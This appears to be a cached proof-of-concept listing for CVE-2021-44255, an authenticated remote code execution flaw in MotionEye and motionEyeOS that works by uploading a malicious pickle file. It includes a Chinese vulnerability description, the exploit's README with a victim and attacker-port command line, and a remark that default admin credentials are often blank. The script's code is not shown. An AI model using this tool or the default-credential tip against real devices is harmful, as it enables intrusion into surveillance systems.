CVE-2021-44255 PoC — motionEyeOS和MotionEye-Project MotionEye 访问控制错误漏洞

Source

https://github.com/pizza-power/motioneye-authenticated-RCE

Associated Vulnerability

Title:motionEyeOS和MotionEye-Project MotionEye 访问控制错误漏洞 (CVE-2021-44255)
Description:motionEyeOS和MotionEye-Project MotionEye都是Calin Crisan个人开发者的产品。motionEyeOS是一种用于单板计算机的视频监控操作系统。MotionEye-Project MotionEye是一个基于网络的运动前端。 MotionEye <= 0.42.1和 motionEyeOS <= 20200606存在访问控制错误漏洞，该漏洞源于经过身份验证的远程代码执行允许远程攻击者可利用该漏洞上传包含恶意python pickle文件的配置备份文件，该文件将在服

Description

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. CVE-2021-44255

Readme

# MotionEye/MotionEyeOS Authenticated RCE
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEyeOS can frequently be found running with default credentials. 

Example:

main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444

Where victim and attacker are in the form of ip:port, unless it is port 80. Then, the port can be excluded. This uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details. 

CVE-2021-44255

See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues.

File Snapshot


 [4.0K]  /data/pocs/c56c0f1726870c926296af2ce30ff8edec1c5387
├── [5.1K]  main.py
└── [ 774]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!